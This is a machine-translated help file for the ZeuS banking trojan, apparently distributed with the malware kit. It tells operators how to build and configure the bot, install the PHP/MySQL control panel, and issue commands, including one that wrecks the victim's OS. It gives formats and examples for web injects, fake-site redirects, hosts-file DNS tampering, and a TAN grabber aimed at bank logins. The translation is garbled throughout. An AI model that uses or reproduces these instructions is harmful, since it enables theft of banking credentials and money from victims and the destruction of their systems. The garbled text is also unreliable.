Translated from the Zeus 1.1.2.2 HTML Help file using Google Translator:
Product Description
ZeuS - Spyware (Spyware, the "bot") for 32-bit MS Windows 2000/XP + to manage the computers of victims and get their information through the logs for reference.
ZeuS consists of three parts:
1. The control panel that is installed on the server (s).
2. Bilder, an application for Windows, to specify the configuration Bot.
3. Boat is the application for Windows, but runs on the victim's computer.
Attention! Depending on the number of active bots, assembly, and setup, you'll need from the usual host to a powerful server or servers.
ZeuS has the following main features and properties (here given a full list in your assembly of the list may be missing):
1. Boat:
a. Written in VC + + 8.0, without the use of RTL, etc., on pure WinAPI, this is achieved through small size (10-25Kb, depending on the assembly).
b. It has its own process, through the same can not be found in the process list.
c. Bypass firewall majority (including the popular Outpost Firewall versions 3, 4, but suschetvuet temporary small problem with antishpionom). Does not guarantee the smooth reception of incoming connections.
d. It is difficult to find the search / analysis, bot sets the victim and creates a file with a temporary system files, and arbitrary size.
e. It works in limited accounts Windows (work in the guest account is currently not supported).
f. Ekvaristiki invisible to antivirus, body bot encrypted.
g. Certain way does not create suspicion in their presence, if you do not want to. Here is the view of the fact that many authors like to make spyware: unloading firewall, antivirus, a ban on their updating, blocking Ctrl + Alt + Del, etc.
h. Lock Windows Firewall (this function is only required for the smooth reception of incoming connections).
i. All your settings / logs / command bot keeps / takes / passes in encrypted form on the HTTP (S) protocol. (ie, in text form data will see only you, all the rest bot <-> server will look like garbage).
j. Detecting NAT through verification of their IP via your preferred site.
k. A separate configuration file that allows you to protect yourself from loss botneta in cases of inaccessibility of the primary server. Plus additional (redundant), configuration files, that bot will handle, will not be available when the main configuration file. This system ensures the survival of your botneta 90% of cases.
l. Ability to work with any browsers / programs working through wininet.dll (Internet Explorer, AOL, Maxton, etc.):
m. Intercepting POST-data + intercepting keystrokes (including the inserted data from the clipboard).
n. Transparent URL-redirection (for feyk sites, etc.) c assignment redirect simplest terms (for example: only with GET or POST request, in the presence or absence of certain data in the POST-request).
o. Transparent HTTP (S) substitution of the contents (Web inzhekt, which allows you to replace not only the HTML pages, and any other data type). The substitution is defined using the guidance of masks substitute.
p. Getting the contents of the desired page with the exception of HTML-tags. Based on Web inzhekte.
q. Adjustable TAN-grabber for any country.
r. Get a list of questions and answers in the bank "Bank Of America" after a successful authentication.
s. Removing the right POST-data to the desired URL.
t. Ideal for Virtual keyboard: After entering the appropriate URL, a screenshot is happening in the area of the screen where the left mouse button pressed.
u. Receiving certificates from the repository "MY" (certificate marked as "not exportable" was not exported correctly), and its purification. After that any imported certificate will be saved on the server.
v. Intercepting a login and password, POP3 and FTP protocols regardless of the port and write it in the log only when a successful authentication.
w. Changes in the local DNS, delete / add entries to the file% system32% \ drivers \ etc \ hosts, ie, comparison of the specified domain with the specified IP address for WinSocket.
x. Saves the contents of Protected Storage when you first start your computer.
y. Removes cookies from Internet Explorer cache when you first start your computer.
z. Search for logical drives of files by mask or download a specific file.
aa. Recording has just visited the page when you first start your computer. Useful when you install via sployty, if you buy a download from suspicious of service, you can see that Georgia is still in hand.
bb. Getting a screenshot of the victim computer in real time, the computer must be located outside the NAT.
cc. Receiving commands from the server and sending the report back on success. (There are currently launching a local / remote file, immediately update the configuration file, the destruction of the OS).
dd. Socks4-server.
ee. HTTP (S) PROXY-server.
ff. Upgrading to the latest versions of bot (URL specified in the new version of config file).
2. Control Panel:
a. To require PHP + MySQL.
b. Simple installation (usually enough input data the user of MySQL and clicking 'Install').
c. Multiplayer mode, each user can assign specific access rights.
d. Statistics plants (installs, infections).
e. Statistics bots are online.
f. Separation botneta to sabbotnety.
g. Browse online bots (also available filter)
h. View the screenshots in real time.
i. View and check Sock4.
j. Time to find a bot online.
k. Connection speed (only for bots outside NAT).
l. Storage of logs in the database. This gives the following advantages:
m. Search log for the content filter.
n. Search log for the templates to the allocation of the necessary POST data (for example, allows you to allocate site http://rambler.ru/ only logs and password, discarding all the others in the quest for data.)
o. Storing logs in encrypted files in the directory structure botnet \ country \ ID computer.
p. Impact teams bots (as can the filter).
q. If you know PHP, you can reconfigure the control panel of your liking.
3. Bilder:
a. Written in VC + + 8.0, without the use of RTL, etc. on pure WinAPI, this is achieved through small size (it depends on the assembly, the assembly with a decoder logs will be more than 400 Kb size, as would be included on the basis of IP).
b. View the status of the current system, as a test bot, you can run it on your computer, and then click a button to delete it.
c. The decoder of logs, with the distribution by country.
d. Bilder configuration file (encrypted) and the bot.
e. Polymorphic kriptor BETA. Currently under testing, and does not guarantee one hundred percent protection from antivursov. But this function is guaranteed to bring the mind in the near future.
Agreement
0.
1. Seller:
a. Must provide quality technical support of the Internet.
b. Not responsible for:
c. loss of information
d. closing / disabling servers
e. flow of traffic
f. Undertakes to correct the errors found in ZeuS, and quickly expel the update without monetary reward.
g. Undertakes to hear any suggestions / opinions / comments on the work of ZeuS, and take appropriate action.
2. Client:
a. Do not have the right to distribute ZeuS for any commercial and non commercial purposes not connected with inetresami seller.
b. There is no law disasamblirovat / study the binary code and the bot bildera.
c. Do not have the right to use the control panel as a means to control other botnetami or any other purpose than to svyazyanyh ZeuS.
d. Do not have the right to deliberately send a portion of what ZeuS to antivirus companies and other similar establishments.
e. Undertakes to give the seller cash reward for any update ZeuS not associated with errors in the work, as well as for adding additional functionality.
In cases of violations of the agreement and the discovery of this fact, you are deprived of any technical support. In addition, the assembly of your bot will be immediately sent to antivirus companies.
Version History
Version 1.0.5.0:
• Changed the format of PE files.
• New opportunities for web-inzhektov.
• Now with the Protected Storage persist Cookies IE.
• A serious vulnerability in the control panel.
• Fix minor bugs in the kernel.
Version 1.0.4.0:
• Hiding exe-file Bot.
• In TAN-grabber added a flag to generate an arbitrary Tana during replacement.
• Fix minor bugs.
Version 1.0.3.0:
• Fixed a serious bug in the kernel.
• A bug in the Web-inzhektah causing incorrect work of IE7.
• Now kukov cleaning is carried out at each start Windows.
• Together with kukami removed. Sol files are active users.
• Added new command rename_bot, allowing to rename bot.
• Improved search log in the control panel.
Version 1.0.2.0:
• In the command line bot added flag-f, which allows you to force updating bot is already installed on your computer regardless of the versions.
• Team upcfg, can now be invoked with a parameter containing a URL to a new configuration file. There will also be forced zapushen boat specified in the record url_loader downloaded configuration file.
• Entries url_logs, url_stats, url_okcmd, url_upload connected into a single record url_server. Also, is sufficient to indicate only the URL to the script without parameters.
• Improved algorithm to work with URL-redirect.
• Added command block_url, unblock_url, block_fake, unblock_fake.
Version 1.0.1.0:
• Improved algorithm for cutting out the tags with the capture of the contents of HTML-pages.
• In the control panel, added the possibility of preserving the language and login after closing the browser.
Version 1.0.0.0:
• Changes in version numbering.
• Section added TanGrabber, which allows you to independently adjust the TANG-grabber to the correct URL.
• Removed record ignore_http. It replaces section WebFilters.
• Removed record step_detan. It replaces section TanGrabber.
• Record botnet moved to section StaticConfig.
• The configuration file is compressed using the UCL (UPX), thus reducing its size by an average of 50%.
• Theoretically, increasing the likelihood of launching Bot.
• The final phase of testing polymorphic kriptora in the next version will be connected.
• In HTTP / HTTPS logs substitution symbol + in the gap.
• In HTTP / HTTPS logs added field Referer.
Setting Bot
1. Of your package build, run 'local \ cp.exe', this file bilder konifguratsii and bot.
2. Open the 'Builder'. Click 'Browse' and specify a configuration file name ??????? 'local \ config.txt'.
3. Click 'Edit config', due to launch a text editor. Reconfigure file oznokomivshis this and this section, save the file.
4. 1
Installation of bot
1. As a minimum, the server must have the following preloaded software: Apahce any version, PHP from version 4 and higher, and MySQL from version 4 and above. Typically, the software has always ustavleno on servers, if not, then please contact our support server.
2. Of your assembly package, copy the contents of the folder 'web' on the server in any directory (preferably separate) of your choice, for which there is access via the HTTP protocol.
3. If the server is running on * nix systems (Linux, FreeBSD, etc.), set to the directory of 'system' of law 0777 (chmod).
4. Run the script via HTTP '.install / index.php' (eg http://bot.net/zeus/.install/index.php), as a result you should start the installation script. If not, it may not properly configured server.
5. Give all the requested data script.
a. Root login: Username and password created by the administrator control panel.
b. MySQL server: The data for the use of MySQL. Specified user must already exist, but if the specified database does not exist, then it will be created automatically (must be a privilege to create a database).
c. MySQL tables: names of tables in MySQL database. It should be changed in cases of masking.
d. Local paths: the path to the local disk directory on the installation.
e. Options: Options (can be changed after installation in the control panel).
i. Enable log write to database: whether to write logs from infected computers in the database, this option allows you to search directly through the control panel, but requires more resources from the server.
ii. Enable log write to local path: whether to write logs from infected computers to a file, the files will be encrypted, and their view is possible only after decryption through bilder.
iii. Online bot timeout: Timeout online bots, depending on the server must be a minimum of 0-5 minutes more importance TIMER_STATS configuration Bot. Recommended value TIMER_STATS plus 5 minutes.
6. Click 'Install', the plant can take up to a minute (to be filled on the basis of IP).
7. Upon successful installation, you can delete the directory '. Install', and you can already go directly to the control panel. Or in the case of errors in the installation, check that the input data might be to check the configuration of PHP and MySQL, also may apply to the technical support ZeuS.
After installation, if you run the installation script again, it is already running in maintenance mode, launch update totally harmless and has a real effect only when you move to a new version of the control panel, but you can use it to change the data entered when you first install or in the event of damage DB. To make the setup again should delete the file 'system / config.php'.
Botnet:: Teams
This section allows you to give different commands bots, with the possibility of using filters. To add a group of commands, click the "Add group", as a result you have to open a dialogue with the group settings:
• Name - The name of any group at your discretion.
• Status - current status (status groups).
• Countries - List of countries separated by a comma, which should be performed for this group of commands, as you can leave blank.
• CompID's: - ID bots, separated by commas, which should serve this group of commands, as you can leave blank.
• Botnety - names botnetov separated by a comma, which should serve this group of commands, as you can leave blank.
• Commands - a list of commands that must comply with boat when this group.
Available commands are:
Komnada and its parameters are written on the rules of the configuration file
1. block_fake [URL-mask] - blocking call any URL-redirect, URL-mask which will be treated under the URL-mask for this command.
2. unblock_fake [mask] - from the list of blocked URL-redirects will remove all URL-masks, which will be approached by URL-masks of this command.
3. block_url - call blocking any URL, which will coincide with the URL-mask for this command.
4. unblock_url - from the list of blocked URL will remove all URL-masks, which will be approached by URL-masks of this command.
5. rexec
6. rexeci
7. lexec
8. lexeci
9. addsf
10. delsf
11. getfile
12. upcfg [URL] - after receiving the command, bot immediately tries to download a configuration file in a standard URL.
13. kos - incapacitate OS, namely overwrite registry branch HKEY_CURRENT_USER and \ or HKEY_LOCAL_MACHINE. If you have sufficient privileges - flies in the "blue screen", in other cases creates brakes. Following these steps will not boot OS is possible!
The format of the configuration file
The original configuration file is a text file encoding in Windows, and you only need to create the final configuration file (which is a binary file to download bot) and the bot. In your bag build an example configuration file must be located in the folder 'local' and be named config.txt. Open the file can be in any text editor, such as' Notebook '(Noteped).
The file consists of entries, one in line. The list consists of the same parameters, the first parameter typically defines the name of the recording (but it is not always the case, for example, in cases when the transfer of any data, not the name). Parameters are separated by spaces between them, and if it occurs in the parameter space, or tab, this option should be placed in double quotes ( "), is also generally applied to the name. The number of parameters is not restricted, as if the record has a name, it is read not case sensitive, ie the listing is reads bilderom true if the name userName or USERNAME or uSERnAME, etc. Accounting for the same register in the parameters defined by its purpose.
Examples:
username Vasya Pupkin
the title of the recording - username, option 1 - Vasya, option 2 - Pupkin.
username "Vasya" Pupkin "
the title of the recording - username, option 1 - Vasya, option 2 - Pupkin.
username "Vasya Pupkin"
the title of the recording - username, option 1 - Vasya Pupkin.
"url" "http://google.com/" search? q = Hello
the title of the recording - url, option 1 - http://google.com/, option 2 - search? q = Hello
There are also special names of records, which allows to divide the configuration file, whether you like subsections, which may contain within itself any number of subkeys and entries. They are called sections and are composed of a name entry, and the parameter defining the section name (the register is also included in this parameter), the end of this section is designated as entry end. Further documentation on the nest record subsections will oboznachatsya through ->. Ie record with the name username belongs section userdata, will be designated as userdata-> username, etc.
Examples:
entry "userdata"
fname "vasya"
lname "pupkin"
end
entry compdata
name "pcvasya"
entry devices - the contents of this section, example, when the record did not have a name, it is simply a listing of devices.
cdrom
"hdd"
fdd
end
end
It's even possible to insert comments, the comment should be placed on a separate line, and start with character ','. If it turns out that the first parameter in the record also begins with ',' then this option should be put in quotation marks.
Examples:
; Hello! I'm Vasya
; I love you
"; I love you" - it is already recording.
Record the configuration file
The file consists of two sections StaticConfig and DynamicConfig.
StaticConfig, the values prescribed in this section directly to the bot file, ie in the exe, and define the basic behavior of bots on the victim's computer.
Depending on your build, some details may not have value for you, all the important parameters prescribed in the example that came with the package assembly.
• botnet [string] - defines the name botneta, which owns bot.
o string - the name botneta, up to 4 characters, or 0 - for the default values.
Recommended value: botnet 0
• timer_config [number1] [number2] - determines the intervals over which should get obnavlenie configuration file.
o number1 - specifies the time in minutes after which the update configuration file, in the case of a successful download the previous times.
o number2 - specifies the time in minutes after which the update configuration file, in case of an error when booting the previous time.
Recommended value: timer_config 60 5
• timer_logs [number1] [number1] - determines the intervals over which to send the accumulated logs on the server.
o number1 - specifies the time in minutes through which to send the logs in case of successful sending the previous times.
o number2 - specifies the time in minutes through which to send logs if an error occurs while sending the previous times.
Recommended value: timer_logs 2 2
• timer_stats [number1] [number2] - determines the intervals over which the statistics should be sent to the server. (includes inastally, finding in the online, open ports services socks, screenshots, etc.)
o number1 - specifies the time in minutes through which to send the statistics, in cases of successful sending the previous times.
o number2 - specifies the time in minutes after which the statistics should be sent, if an error occurs while sending previous times.
Recommended value: timer_logs 20 10
• url_config [url] - URL of which is the main configuration file, this is the most important parametor when infecting kompyuetra victim on the orders of the URL will not be available on this configuration, the infection does not make sense.
• url_compip [url] [number] - specifies the site where you can check your IP, is used to determine the NAT.
o url - specifies the URL of the site
o number - determines kolichetsvo bytes, which is to swing from the site to see the web in its IP.
• blacklist_languages [number1] []...[ chisloX number2] - defines a list of language codes, Windows, for which the bot will always be located in spyashem mode, ie he would not expel the logs and statistics, but will refer to the configuration file.
o chisloX - a language code, for example, for RU - 1049, EN - 1033.
DynamicConfig, the values prescribed in this section of the final configuration file.
Depending on your build, some details may not have value for you, all the important parameters prescribed in the example that came with the package assembly.
• url_loader [url] - defines the URL, which you can download the update Bot. This parameter is relevant only if you run into a new version of bot botnete and prescriptions for the configuration of it on the same URL, and that the old configuration, in this case, older versions of bot will update downloading a file, specified in this listing.
• url_server [url] - defines the URL, which will be sent to statistics, files, logs, etc. from the computers of victims.
• file_webinjects [file] - specifies a local file, which is a list of web izhektov. Description of the format of this file can be found here
• filesearch [flags] [list] - define a list of files, which will be continually search for files on the computers of victims.
• flags - define your search files.
o H - search for files on your hard drive.
o R - search for files on removable drives (flash cards).
o C - search for files on CD / DVD drives.
o F - search for files on A: and B: drive (not recommended).
o N - Search files on network drives.
• list - a list of file masks separated by semicolons.
• Subdivision AdvancedConfigs - enumerates a list of URL, which you can download a backup configuration file, in case of no availability of the core file. We recommend that you fill out this subsection 1-3 URL, which will save the botnet of death in cases of unavailability of the main configuration file, and the result quietly to translate it to another server. Mandatory availability of files on this URL are not required, then the main thing to be able to put the files on this URL. Files should be mixing it only after the discovery of the inaccessibility of the main configuration file, if you always want to have the files on this URL, you should update all of them simultaneously, along with the basic configuration files. Backup files are no different than from the mainstream and created the same way.
Example:
entry "AdvancedConfigs"
"http://url1/cdffd.ccc"
"http://url2/cdf34.dc"
end
• Subdivision WebFilters - has two purposes:
o enumerates a list of masks URL, which must be stored or deleted from the log, regardless of the type of request (GET, POST). If the first mask is a symbol '!', Then match the URL with this mask, the record in the log will not be made (eg mask "*" will prevent entry of URL, except those listed before it).
o Specifies the mask URL, at the beginning of treatment which will be created in the screenshots of your screen click the left mouse button (useful to avoid the virtual keyboard). This mask URL must begin with the character '@'.
Note: for the URL listed in this section ignores the value StaticConfig.ignore_http
Example:
entry "WebFilters"
in the log will be written all the URL corresponding to this mask.
"http://www.google.com/ *"
in the log will not write all URL similar to this mask.
"! http:// * yahoo.com / *"
after opening the page, the screenshots will be created in the game left mouse button.
"@ http://www.rambler.ru/"
end
• Subdivision WebFakes - enumerates a list of transparent URL-redirects (feyk sites), a detailed description of this section is here
• Subdivision TanGrabber - determine the rules for the TAN-grabber, a detailed description of this section is here
• Subdivision DnsMap - a list of DNS changes to be made in the file% system32% \ drivers \ etc \ hosts.
Recording format: [IP] [domain].
IP - the IP domain.
domain - the domain name for which changes IP. If the domain starts with a '!', Then this domain will have Dalein from the file, of course if he is found. The value of the IP is ignored and can be anything.
Example:
entry "dnsmap"
127.0.0.1 microsoft.com
192.168.0.1 google.com
0.0.0.0! Yahoo.com
end
URL-redirects
Enumeration of URL-redirects (hereinafter simply feyki) is written in subsection WebFakes section DynamicConfig.
Recording format: [original URL] [new URL] [flags] [blekmaska POST] [vaytmaska POST] [URL Blocking] [name]
Original URL - URL you want to replace, you can use a mask.
• a new URL - ie feyka, URL that you want to download instead of the original URL.
• flags - specifies the basic conditions of loading, may consist of several flags in any order, but with sensitivity. Currently, the following flags:
• P - load the new URL with the POST request to the original URL.
• G - to load a new URL in the GET request to the original URL.
• S - to load a new URL to the conservation track.
• This allows moisture to freely use the "Bench-sites" as usual "feyk page," for more on this flag, see below.
• blekmaska POST - is a mask POST-data sent the new URL, which will not be loaded feyka. Usually here the fields encountered in feyki, it allows you to save feyku of the loop on itself. If you do not need to fill out this field, just leave it blank or write a character *.
• vaytmaska POST - is a mask POST-data sent the new URL, which will be loaded feyka. Ie If the POST-data does not coincide with the mask, the feyka will not be loaded. This field is used in practice, very often, leave it blank or write symbol * to ignore this field.
• URL blocking - if your URL-redirection ??? be loaded on the computer once the victim, there should be masked URL, in case of which the URL-redirection will no longer be used on a computer. If you do not need to leave the field blank.
• name - the name of URL-redirect.
Algorithm for download URL-redirect:
1. Search URL loaded the victim into the configuration file.
2. Check the flags.
3. Check for convergence blekmaski.
4. Check for convergence vaytmaski.
5. Download the new URL.
Using the flag "S":
This flag is most often used for the transfer of control "Bench-site." As a result of the flag, the new URL should yavlyatsya root URL for "Bench-site, bot will dobovlyat new URL at the end of the path of the real URL, starting after the last slash (simoly:" \ ","/") sovpadaeshego original URL.
Examples:
entry webfakes
• http:// *. rambler.ru * http://yandex.ru GP * *
• what would be the page did not attempt to open the victim to rambler.ru, there will always be loaded main page yandex.ru
• http://mail.rambler.ru/script/auth.cgi http://mydomain/myrambler.asp P "* & mailtan =*" *
• example of "transitional" feyka which includes a field mailtan. There will be loaded feyka at POST-request, which is not found mailtan, so after feykom victim normally goes to your e-mail.
• http://mail.rambler.ru/script/auth.cgi http://mydomain/myrambler.asp P "* & mailtan =*" "* login =*"
• example of "transitional" feyka which includes a field mailtan. There will be loaded feyka at POST-request, which is not found and found mailtan login.
end
Creating Web inzhektov
For ease of writing, web inzhekty recorded in a separate file specified in the configuration file as DynamicConfig.file_webinjects. Naturally, after creating the ultimate configuration file, or what additional files are generated.
The file is a list of URL to which you can specify an unlimited number of web inzhektov changed URL specified string on the rules of the configuration file: set_url [URL] [flags] [blekmaska POST] [vaytmaska POST] [URL Blocking] [Context mask] [name ], while the last three parameters are not mandatory.
• URL - URL to which to operate a Web inzhekt, you can use a mask.
• flags - specifies the basic conditions of loading, may consist of several flags in any order, but with sensitivity. Currently, the following flags:
• P - to launch a Web inzhekt with POST request to URL.
• G - run a web inzhekt when GET request for URL.
• L - modifies the destination Web inzhekta, if you specify this flag, it will obtain a piece of data and immediately saved to the log.
• F - complements the flag L, allows you to record the result is not in the log, but in a separate file.
• H - complements the flag L, maintains the desired piece of data without excision of the tags.
• D - to launch a Web inzhekt every 24 hours.
• blekmaska POST - is a mask POST-data transmitted URL, which will not run a web inzhekt.
• vaytmaska POST - is a mask POST-data transmitted URL, which will run the web inzhekt.
• Lock URL - if your web inzhekt be loaded ??? once the victim computer, it should be masked URL, in case of which the Web inzhekt will no longer be used on a computer. If you do not need to leave the field blank.
• context mask - a mask of the page content, which should work for web inzhekt.
• name - name of web inzhekta.
After stating the URL, with the next line begins the transfer of the web inzhektov, which lasts until the end of the file is not reached or not a new URL using a regular recording set_url. One Web inzhekt consists of three elements:
• Without the flag L:
o data_before - mask data, after which you want to write new data.
o data_after - mask data to be recorded before the new data.
o data_inject - new data, which will be replaced by the contents of data_before, data_after.
• Since the flag L:
o data_before - the mask data after the start bit of the data.
o data_after - the mask data before the end of a piece of data.
o data_inject - plays the title role for the data is needed only for the visual selection in the logs.
The name element must start with the first byte of a new line immediately after the end of the name must be the transfer to the next line. Over the next line are the data Web inzhekta, ending a string of data indicated data_end, also a line must begin with the first byte of the next line. Inside the element, you can freely use any of the characters.
Notes:
1. As is known, the new line may have one (0x0A) or two (0x0D and 0x0A) bytes. Since mainly web inzhekt is used to displace the contents of text data, this feature takes into account, and the bot has successfully launched a web-inzhekt even if you have new lines are marked by two bytes, and the contents URL one byte and vice versa.
2. Elements of the Web inzhekta can be arranged in any order, ie data_before, data_after, data_inject, or data_before, data_inject, data_after etc.
3. The element can be empty.
4. When using the flag L, the data in each tag zamenyayutya in one space.
Example:
;Substitution of title to any site on the http protocol to the phrase "HTTP: Web-Inject"
set_url http:// * GP
data_before
data_end
data_inject
HTTP: Web-Inject
data_end
data_after
</ title>
data_end
Substitution of title to any site on the http protocol to the phrase "HTTPS: Web-Inject" and dobvalenie text "BODY: Web-Inject" immediately after the tag <body>
set_url https: / / * GP
data_before
<title>
data_end
data_inject
HTTPS: Web-Inject
data_end
data_after
</ title>
data_end
data_before
<body>
data_end
data_inject
<hr> BODY: Web-Inject <hr>
data_end
data_after
data_end
, Obtained the title of the page
set_url http:// * yahoo.com * LGP
data_before
<title>
data_end
data_inject
Yahoo Title: Web-Inject
data_end
data_after
</ title>
data_end
TAN-grabber
Is a listing of the settings TAN-grabber, stored in sub-section TabGrabber DynamicConfig.
Recording format: [Mask URL] [flags] [vaytmaska POST] [blekmaska POST] [name value]
• Mask URL - URL to which you move should be looked at TAN POST-data.
• flags - Defines the basic condition for obtaining Tana, may consist of several flags in any order, but with sensitivity. Taken together, allow a more precise definition of TANG. Currently, the following flags:
o Sxx - is determined by the number of missed TANov be a substitute for TANG. xx - number from 1 to 99, which determines this number.
o Rxx - Specifies that the name of Tana in the POST-data is variable, and to determine the location of Tana position. xx - number from 1 to 99, which determines the position.
o Cxx - Specifies the number of digits in the Tanya. xx - number from 1 to 9.
o Gxx - Replacing Tana at random instead of the standard "111111".
• vaytmaska POST - is a mask POST-data transmitted URL, which will be launched TANG-grabber.
• blekmaska POST - is a mask POST-data transmitted URL, which will not run TANG-grabber.
• name meaning - if you do not specify the flags R or C, it is required to specify the variable name in the POST-data, which contains TANG, you can use a mask.
Algorithm TAN-grabber:
1. Search the URL in the config file.
2. Check POST-data.
3. Check the values the flag S.
4. Find variable with TANom.
5. Saving Tana.
6. The substitution of Tana in POST-data, and continuation of the inquiry.
Examples:
entry tangrabber
https: / / banking .* sparkasse *. de / cgi / login.cgi S3 * tan
end
=============================